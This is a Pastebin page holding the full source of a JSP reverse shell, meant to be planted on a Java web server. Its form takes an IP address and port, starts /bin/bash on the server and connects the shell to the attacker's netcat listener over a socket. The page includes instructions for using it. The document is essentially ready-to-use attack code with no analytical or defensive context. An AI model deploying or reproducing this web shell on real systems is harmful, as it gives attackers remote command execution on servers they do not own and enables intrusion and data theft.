SHARE
TWEET

Untitled

a guest Jul 13th, 2019 88 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <%@page import="java.lang.*"%>
  2. <%@page import="java.util.*"%>
  3. <%@page import="java.io.*"%>
  4. <%@page import="java.net.*"%>
  5.  
  6. <%
  7. class StreamConnector extends Thread {
  8.  
  9.     InputStream is;
  10.     OutputStream os;
  11.  
  12.     StreamConnector(InputStream is, OutputStream os) {
  13.         this.is = is;
  14.         this.os = os;
  15.     }
  16.  
  17.     public void run() {
  18.         BufferedReader isr = null;
  19.         BufferedWriter osw = null;
  20.         try {
  21.             isr = new BufferedReader(new InputStreamReader(is));
  22.             osw = new BufferedWriter(new OutputStreamWriter(os));
  23.             char buffer[] = new char[8192];
  24.             int lenRead;
  25.             while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {
  26.                 osw.write(buffer, 0, lenRead);
  27.                 osw.flush();
  28.             }
  29.         } catch (Exception e) {
  30.             System.out.println("exception: " + e.getMessage());
  31.         }
  32.         try {
  33.             if (isr != null)
  34.                 isr.close();
  35.             if (osw != null)
  36.                 osw.close();
  37.         } catch (Exception e) {
  38.             System.out.println("exception: " + e.getMessage());
  39.         }
  40.     }
  41.  
  42. }
  43. %>
  44.  
  45. <h1>JSP Reverse Shell</h1>
  46. <p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>
  47. <form method="get">
  48.     IP Address<input type="text" name="ipaddress" size=30 value="127.0.0.1"/>
  49.     Port<input type="text" name="port" size=10 value="1234"/>
  50.     <input type="submit" name="Connect" value="Connect"/>
  51. </form>
  52.  
  53. <%
  54.     String ipAddress = request.getParameter("ipaddress");
  55.     String ipPort = request.getParameter("port");
  56.     Socket sock = null;
  57.     Process proc = null;
  58.     if (ipAddress != null && ipPort != null) {
  59.         try {
  60.             sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
  61.             System.out.println("socket created: " + sock.toString());
  62.             Runtime rt = Runtime.getRuntime();
  63.             proc = rt.exec("/bin/bash");
  64.             System.out.println("process /bin/bash started: " + proc.toString());
  65.             StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());
  66.             System.out.println("outputConnector created: " + outputConnector.toString());
  67.             StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());
  68.             System.out.println("inputConnector created: " + inputConnector.toString());
  69.             outputConnector.start();
  70.             inputConnector.start();
  71.         } catch (Exception e) {
  72.             System.out.println("exception: " + e.getMessage());
  73.         }
  74.     }
  75.     if (sock != null && proc != null) {
  76.         out.println("<div class='separator'></div>");
  77.         out.println("<p>Process /bin/bash, running as (" + proc.toString() + ", is connected to socket " + sock.toString() + ".</p>");
  78.     }
  79. %>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top